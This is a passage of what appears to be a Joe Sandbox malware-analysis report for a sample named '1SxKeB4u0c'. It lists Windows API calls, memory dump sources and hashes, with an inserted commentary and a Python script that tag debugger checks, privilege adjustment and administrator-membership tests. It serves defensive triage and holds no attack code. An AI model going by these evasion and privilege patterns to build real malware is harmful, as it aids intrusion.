                                                                              • Instruction Fuzzy Hash: 34E01231848A28ABCF016F29D808A597BAAEF487C1B004954FF058B121CB35D962CB80
                                                                              APIs
                                                                              • __time64.LIBCMT ref: 0046889B
                                                                                • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                                                                • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                              • String ID: 0eL
                                                                              • API String ID: 2893107130-3167399643
                                                                              • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                              • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                                                                              • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                                              • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                                                              • FindClose.KERNEL32(00000000), ref: 0046C72B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                              • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                                                                              • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                                              • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFormatLastMessage
                                                                              • String ID:
                                                                              • API String ID: 3479602957-0
                                                                              • Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                                              • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                                                                              • Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                                              • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                                                                              APIs
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                              • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                              • String ID:
                                                                              • API String ID: 81990902-0
                                                                              • Opcode ID: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                                                              • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                                                                              • Opcode Fuzzy Hash: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                                                              • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
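The API listings in the blocks above are what an analyst actually triages in a report of this shape: the IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter sequence at 02F51459 (a sequence the MSVC CRT's own security-failure handler also emits, so on its own it is a lead, not a verdict), the LookupPrivilegeValueW / AdjustTokenPrivileges pair at 0045882B, and the AllocateAndInitializeSid / CheckTokenMembership / FreeSid triple at 00458774, whose sub-authority arguments 00000020 and 00000220 are SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS, i.e. S-1-5-32-544 (Builtin\Administrators) if the identifier authority, which the listing shows only as "?", is SECURITY_NT_AUTHORITY. The Python below is an added example and not part of the Joe Sandbox report or the sample: it parses a constructed copy of these function summaries (trimmed to the lines the parser needs) and tags each function by the call set it lists. The tag names and the matching rules are this example's own assumptions, not Joe Sandbox signature names.

```python
"""Triage helper for Joe Sandbox-style function summaries (added example; tags are hypothetical)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: the 'APIs' / 'Memory Dump Source' lines of three functions, copied in the
# shape the report prints them and trimmed to what the parser needs. Not a live export.
SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 02F51459
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02F51463
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 02F51470
Memory Dump Source
• Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
APIs
  • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
• GetLastError.KERNEL32 ref: 00458865
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
• FreeSid.ADVAPI32(?), ref: 0045879B
Memory Dump Source
• Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

# One API line: optional 'Part of subcall function XXXX:' prefix, Name.MODULE, an optional
# argument list (raw stack values, '?' where unrecoverable), then 'ref: <call-site address>'.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>\S+?)\.(?P<mod>\w+)(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
SRC_RE = re.compile(r"Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")

# Well-known RIDs from winnt.h: S-1-5-32-544 is Builtin\Administrators.
SECURITY_BUILTIN_DOMAIN_RID = 0x20
DOMAIN_ALIAS_RID_ADMINS = 0x220


@dataclass
class Call:
    name: str
    module: str
    args: List[str]
    ref: int
    subcall: bool  # True when the report attributes the call to a callee of this function


@dataclass
class Function:
    calls: List[Call] = field(default_factory=list)
    image_base: Optional[int] = None     # 'Offset:' of the dump the function was lifted from
    backed_by_pe: Optional[bool] = None  # 'based on PE:'; False means an unmapped region


def parse_report(text: str) -> List[Function]:
    """Split the summaries into one record per function: its API calls plus dump source."""
    funcs: List[Function] = []
    cur: Optional[Function] = None
    for line in text.splitlines():
        s = line.strip()
        # 'APIs' opens a function; a 'Memory Dump Source' with no preceding 'APIs' does too.
        if s == "APIs" or (s == "Memory Dump Source" and (cur is None or cur.image_base is not None)):
            cur = Function()
            funcs.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            cur.calls.append(Call(m.group("name"), m.group("mod"), args,
                                  int(m.group("ref"), 16), m.group("sub") is not None))
            continue
        m = SRC_RE.search(line)
        if m:
            cur.image_base = int(m.group("off"), 16)
            cur.backed_by_pe = m.group("pe") == "true"
    return funcs


def classify(fn: Function) -> List[str]:
    """Tag a function by the call set it lists directly (subcall lines are excluded)."""
    names = {c.name for c in fn.calls if not c.subcall}
    tags: List[str] = []
    if {"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"} <= names:
        tags.append("debugger-check+exception-filter")
    if {"LookupPrivilegeValueW", "AdjustTokenPrivileges"} <= names:
        tags.append("privilege-enable")
    for c in fn.calls:
        # AllocateAndInitializeSid(pAuthority, nSubAuthorityCount, sub0, sub1, ...): a two-level
        # SID 32-544 next to CheckTokenMembership is the usual "am I an administrator" test.
        if c.name == "AllocateAndInitializeSid" and len(c.args) >= 4:
            try:
                count, sub0, sub1 = (int(a, 16) for a in c.args[1:4])
            except ValueError:  # '?' placeholders cannot be interpreted
                continue
            if (count, sub0, sub1) == (2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS) \
                    and "CheckTokenMembership" in names:
                tags.append("builtin-admins-membership-check")
    if fn.backed_by_pe is False:
        tags.append("code-in-unbacked-memory")
    return tags


def triage(text: str) -> List[dict]:
    """One row per tagged function, keyed by the address of its first direct API call."""
    rows = []
    for fn in parse_report(text):
        tags = classify(fn)
        if tags and fn.calls:
            first = next((c for c in fn.calls if not c.subcall), fn.calls[0])
            rows.append({"first_ref": f"{first.ref:08X}", "tags": tags})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row["first_ref"], ", ".join(row["tags"]))
```

The parser keys on the report's own conventions (the "ref:" call-site address, the "Offset:" and "based on PE:" fields of the dump source) so the same rules can be run over the full export rather than the three trimmed blocks embedded here; the "code-in-unbacked-memory" tag only records that the plugin could not tie the dump region to a mapped PE, which is the fact the report states, not a judgement about how the region got there.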
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                              • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                                                              • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                                              • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              APIs
                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02F5399E,?,?,00000008,?,?,02F51CF4,00000000), ref: 02F53BD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID:
                                                                              • API String ID: 3997070919-0
                                                                              APIs
                                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: mouse_event
                                                                              • String ID:
                                                                              • API String ID: 2434400541-0
                                                                              APIs
                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: LogonUser
                                                                              • String ID:
                                                                              • API String ID: 1244722697-0
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                                              • Instruction ID: ff6d5df8c18bcbe8fe2101f5cfd884a08bdb116bda97db56ce45bba43b3dbdc4
                                                                              • Opcode Fuzzy Hash: 22795c9ed03d84af6dcafcb4bd33591edb2504b77a473f2716c7a4c8c56812e9
                                                                              • Instruction Fuzzy Hash: 5A6160736197818FC32CCE2CC89145ABBE2EEA521474C8F6DD4D687792D670FA09C792
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e8d29d21587b575dc380072ea0b0f6c36b56ec1beeab86bfee52f3ca4c60ba64
                                                                              • Instruction ID: 6f01462ae6c2d954a41bcfc5807c00cc9a2db527f046e7f1aaa93a6dc0367920
                                                                              • Opcode Fuzzy Hash: e8d29d21587b575dc380072ea0b0f6c36b56ec1beeab86bfee52f3ca4c60ba64
                                                                              • Instruction Fuzzy Hash: EE61E3359287A84BD3169A39E85267AF394FFD63C4F54C73EEB8173A40DB2411268744
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                              • Instruction ID: 9b73fb6413c2de0e7a9154eaf4436e2265fe1c02b938a501d87519b57db06e1e
                                                                              • Opcode Fuzzy Hash: ab2fee5558319bb7b77599fdacabd9ee24db5531fb8add38223017fc8891590f
                                                                              • Instruction Fuzzy Hash: FF310A32A092845BCF328E587808AB57FA8BBA3775F1DC156E45C8B1A2D3219C44FE61
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ba4fd56b7d2ac45bfb91129d94ad6666f78c5595d5728fe56f0bdefbebfc0174
                                                                              • Instruction ID: 4fb3fd19513731da0d36763215fb0be7ee8aa40e035e5c98f8bd5e9e6619c9ad
                                                                              • Opcode Fuzzy Hash: ba4fd56b7d2ac45bfb91129d94ad6666f78c5595d5728fe56f0bdefbebfc0174
                                                                              • Instruction Fuzzy Hash: B041BE31A083558FD728EE29E8E067BB3D2FBC9385F65493ED78283280CB386415CB51
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                                              • Instruction ID: 1f93681bd071c9b310666e60ae9e723361838b6add535ed4ccf0dafbb0d06587
                                                                              • Opcode Fuzzy Hash: b33081dabc7f6469ce34c37c8165833aea82e5abc41e973800425e6ee7c24666
                                                                              • Instruction Fuzzy Hash: 1E4170756183019F8348CF69C58091AFBE2BFCC318F25896EE8999B311D735E942CF92
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                                              • Instruction ID: b5869b5d75bce0de78fe886a00a9b2f8a43124a0caffc1323e520ea091567c1b
                                                                              • Opcode Fuzzy Hash: c76a15beeee963c4f84a445264956e8a3ca97236d94a4da0cbf7fb091b069d5c
                                                                              • Instruction Fuzzy Hash: 4441AF456DE1C21EEB0B0B7190762E2EFF16CAF0487AEAAD9C0D80E203C503C587DB94
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1454997766.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2f10000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                              • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                              • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                                                                              • IsWindowVisible.USER32(?), ref: 0048364B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
